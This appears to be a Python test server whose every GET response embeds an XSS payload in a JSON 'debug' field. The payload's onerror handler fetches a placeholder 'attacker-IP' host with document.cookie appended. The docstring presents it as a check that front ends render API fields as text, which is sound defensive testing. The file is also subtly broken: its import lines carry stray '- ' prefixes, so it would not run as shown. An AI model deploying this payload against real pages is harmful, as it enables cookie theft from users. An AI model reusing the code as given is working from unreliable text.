- from http.server import HTTPServer, SimpleHTTPRequestHandler
- import sys
- import logging
- import json
class CORSRequestHandler(SimpleHTTPRequestHandler):
    """Test responder that returns HTML markup inside a JSON field.

    Every GET is answered with ``{"debug": "<img ... onerror=...>"}``. The
    value is inert as JSON; it only becomes script if the consuming page
    writes the field into the DOM as HTML (for example through
    ``innerHTML``) instead of as text. The handler in the markup reads
    ``document.cookie``, so cookies flagged ``HttpOnly`` are not exposed to
    it. Use this to check that a client treats API response fields as
    untrusted data: render them with ``textContent`` or an output encoder,
    and back that up with a Content-Security-Policy.
    """

    def end_headers(self):
        """Append the permissive CORS and no-cache headers, then finish."""
        # Wildcard CORS lets a page on any origin read this response, which
        # is what allows a front end under test to consume it cross-origin.
        extra_headers = (
            ('Access-Control-Allow-Origin', '*'),
            ('Access-Control-Allow-Methods', '*'),
            ('Access-Control-Allow-Headers', '*'),
            ('Cache-Control', 'no-store, no-cache, must-revalidate'),
        )
        for header_name, header_value in extra_headers:
            self.send_header(header_name, header_value)
        return super().end_headers()

    def do_OPTIONS(self):
        """Answer CORS preflight requests with an empty 200."""
        self.send_response(200)
        self.end_headers()

    def do_GET(self):
        """Log the request headers and reply with the JSON test document."""
        # Request headers are written to the root logger at ERROR level so
        # they show up without any logging configuration.
        logging.error(self.headers)
        # "attacker-IP" is a placeholder host, not a resolvable address.
        body = json.dumps({
            'debug': '<img src=x onerror=fetch("http://attacker-IP/?"+document.cookie)>'
        }).encode()
        self.send_response(200)
        self.send_header('Content-type', 'application/json')
        self.end_headers()
        self.wfile.write(body)
# Usage: script.py [host] port
# With one argument it is the port; with two, the first is the bind address.
# With no host given the server binds 0.0.0.0, i.e. every interface, so the
# test responder is reachable from the network; pass 127.0.0.1 as the host
# to keep it local.
argv_tail = sys.argv[1:]
host = argv_tail[0] if len(argv_tail) > 1 else '0.0.0.0'
port = int(argv_tail[-1]) if argv_tail else 8000
print("Listening on {}:{}".format(host, port))
httpd = HTTPServer((host, port), CORSRequestHandler)
# Blocks until the process is interrupted.
httpd.serve_forever()